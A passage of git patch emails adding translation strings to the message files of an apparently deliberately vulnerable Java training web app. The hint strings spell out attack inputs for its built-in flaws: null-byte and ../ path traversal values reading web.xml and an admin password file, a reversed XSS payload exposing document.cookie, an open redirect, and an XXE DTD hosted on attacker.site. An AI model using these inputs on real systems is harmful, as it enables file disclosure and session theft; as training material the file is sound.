page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From 86e8c69e53ea7b3c54ebc102836b6b1171022036 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:45 +0900 Subject: [PATCH 118/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From d310df26d6e80a73535aa7f53c33b27d9b4e690f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:48 +0900 Subject: [PATCH 119/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From f2c9d976586054b2926253dad2befdd685ba4a77 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:51 +0900 Subject: [PATCH 120/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index f732004..a942280 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -250,6 +250,7 @@ msg.note.mojibake=\u6587\u5b57\u5217\u306b\u65e5\u672c\u8a9e\u3092\u5165\u529b\u msg.note.netsocketleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u30bd\u30b1\u30c3\u30c8\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.not.use.ext.db=\u30c7\u30fc\u30bf\u30d9\u30fc\u30b9\u30b3\u30cd\u30af\u30b7\u30e7\u30f3\u30ea\u30fc\u30af\u306f\u3001MySQL\u306a\u3069\u306e\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306b\u306e\u307f\u767a\u751f\u3057\u307e\u3059\u3002\u5916\u90e8RDBMS\u3092\u4f7f\u7528\u3059\u308b\u5834\u5408\u306f\u3001application.properties\u3092\u7de8\u96c6\u3057\u3066\u4e0b\u3055\u3044\u3002 msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=\u30af\u30a8\u30ea\u30b9\u30c8\u30ea\u30f3\u30b0\u3092template\=../uid/adminpassword.txt?\u306b\u5909\u66f4\u3059\u308b\u3068\u3001\u3053\u306e\u30da\u30fc\u30b8\u306badminpassword.txt\u306e\u5185\u5bb9\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.note.roundofferror=1\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u4e38\u3081\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=\u30e6\u30fc\u30b6\u30fc\u306e\u4e00\u62ec\u767b\u9332 title.xss.page=\u6587\u5b57\u5217\u306e\u9006\u8ee2 From 56b7992842f041637a9178a6da3a8746f49bfb80 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:55 +0900 Subject: [PATCH 121/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From ba271540549d0c4647a3f2681fa4b2c3d7358d4b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:24:58 +0900 Subject: [PATCH 122/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From 770345982b34455f22e5327a83e1e56d0d474722 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 19:25:00 +0900 Subject: [PATCH 123/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index a04ce8f..e270424 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -250,6 +250,7 @@ msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. msg.note.netsocketleak=Network socket leak occurs every time you load this page. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, then you can download a file which includes the content of web.xml. +msg.note.oidc.invalid.config=To use this feature, you need to define appropriate OpenID Connect properties in application.properties. msg.note.open.redirect=You can login with admin and password. If you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. msg.note.roundofferror=Round off error occurs if you enter 1. @@ -349,6 +350,7 @@ title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File +title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect title.xee.page=Batch Registration of Users title.xss.page=Reverse String From eb048546cb4944e7590fcf3b74373ab9fe60a7bb Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:17 +0900 Subject: [PATCH 124/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 6eadc2de1ad54b0cc06e64a3aa91d28a6fb106bf Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:21 +0900 Subject: [PATCH 125/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From cce19eba1d0a43766355ee0302dbe9de3321ac21 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:25 +0900 Subject: [PATCH 126/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From 783d894c8baaf3ab49d08d9114092a2186609376 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:28 +0900 Subject: [PATCH 127/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index e270424..e4296dc 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=It is easy to guess an account who can logs in because authentication error messages on this page are too detailed. function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=There is an XEE vulnerability in this page. function.description.xss=There is a cross site scripting vulnerability in this page. function.description.xxe=There is an XXE vulnerability in this page. @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=Extension Unrestricted File Upload function.name.unrestricted.size.upload=Size Unrestricted File Upload function.name.verbose.error.message=Verbose Authentication Error Messages function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML Entity Expansion) function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) @@ -122,6 +124,7 @@ label.available.characters=Available Characters label.browser=Browser label.calculate=Calculate label.capitalized.string=Capitalized String +label.change=Change label.character.count=Character Count label.code=Code label.content=Content @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< msg.note.xxe.step1=If you create the following DTD file on a web server that can be accessed from this server, for example, http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. -msg.select.year=Please select an year. +msg.select.log.level=Please select a log level of the console logger which is used only in this feature. msg.select.upload.file=Select a file to upload. +msg.select.year=Please select an year. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} msg.update.records=Updated {0} records. @@ -352,6 +357,7 @@ title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File title.userinfo.page=User Information title.vulnerabileoidcrp.page=Login with OpenID Connect +title.weakreference.page=Console Logger Test title.xee.page=Batch Registration of Users title.xss.page=Reverse String title.xxe.page=Batch Update of Users From cbbf6cf6621d2fc9b5e931778c8f048f34190f55 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 25 Oct 2019 22:37:31 +0900 Subject: [PATCH 128/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index a942280..00e32d1 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -63,6 +63,7 @@ function.description.unrestricted.ext.upload=This page is vulnerable for attacks function.description.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. function.description.verbose.error.message=\u3053\u306e\u30ed\u30b0\u30a4\u30f3\u30da\u30fc\u30b8\u306e\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8\u306f\u89aa\u5207\u904e\u304e\u308b\u305f\u3081\u3001ID\u3068\u30d1\u30b9\u30ef\u30fc\u30c9\u304c\u63a8\u6e2c\u3055\u308c\u308b\u53ef\u80fd\u6027\u304c\u9ad8\u3044\u3067\u3059\u3002 function.description.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +function.description.weak.reference=This page uses a weakly referenced object, so the behavior changes after being collected by the GC. function.description.xee=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXEE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.xss=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXSS\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.xxe=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fXXE\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 @@ -109,6 +110,7 @@ function.name.unrestricted.ext.upload=\u62e1\u5f35\u5b50\u5236\u9650\u306e\u7121 function.name.unrestricted.size.upload=\u30b5\u30a4\u30ba\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 function.name.verbose.error.message=\u89aa\u5207\u904e\u304e\u308b\u8a8d\u8a3c\u30a8\u30e9\u30fc\u30e1\u30c3\u30bb\u30fc\u30b8 function.name.vulnerabileoidcrp=Login with Insufficient OpenID Connect Implementation +function.name.weak.reference=Using Weak Reference Object function.name.xee=XEE (XML\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3\u62e1\u5f35) function.name.xss=XSS (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u30d7\u30c6\u30a3\u30f3\u30b0) function.name.xxe=XXE (XML\u5916\u90e8\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3) @@ -122,6 +124,7 @@ label.available.characters=\u5229\u7528\u53ef\u80fd\u306a\u6587\u5b57 label.browser=\u30d6\u30e9\u30a6\u30b6 label.calculate=\u8a08\u7b97\u3059\u308b label.capitalized.string=\u5148\u982d\u3092\u5927\u6587\u5b57\u306b\u3057\u305f\u6587\u5b57\u5217 +label.change=Change label.character.count=\u6587\u5b57\u6570 label.code=\u30b3\u30fc\u30c9 label.content=\u672c\u6587 @@ -266,6 +269,7 @@ msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including msg.note.unrestrictedsizeupload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 msg.note.verbose.errror.message=You can login with admin and password. It is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.vulnerabileoidcrp=This page uses OpenID Connect for login, but it is vulnerable because of insufficient verification. +msg.note.weakreference=If you repeatedly load this page, the log level will be restored to the default INFO. msg.note.xee=\u4ee5\u4e0b\u306eXML\u30d5\u30a1\u30a4\u30eb\u3092\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3059\u308b\u3068\u3001\u30b5\u30fc\u30d0\u30fc\u30ea\u30bd\u30fc\u30b9\u3092\u6d6a\u8cbb\u3057\u307e\u3059\u3002 msg.note.xss=\u540d\u524d\u306b>tpircs/<;)eikooc.tnemucod(trela>tpIrcs<\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u30bb\u30c3\u30b7\u30e7\u30f3ID\u304c\u8868\u793a\u3055\u308c\u307e\u3059\u3002 msg.note.xxe.step1=\u3053\u306e\u30b5\u30fc\u30d0\u30fc\u304b\u3089\u30a2\u30af\u30bb\u30b9\u3067\u304d\u308bWeb\u30b5\u30fc\u30d0\u30fc\u306b\u6b21\u306eDTD\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u307e\u3059\u3002\u4f8b) http\://attacker.site/vulnerable.dtd @@ -279,8 +283,9 @@ msg.question.reach.the.moon=0.1mm\u306e\u539a\u3055\u306e\u7d19\u3092\u4f55\u56d msg.reverse.color=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2\u3092\u884c\u3046\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 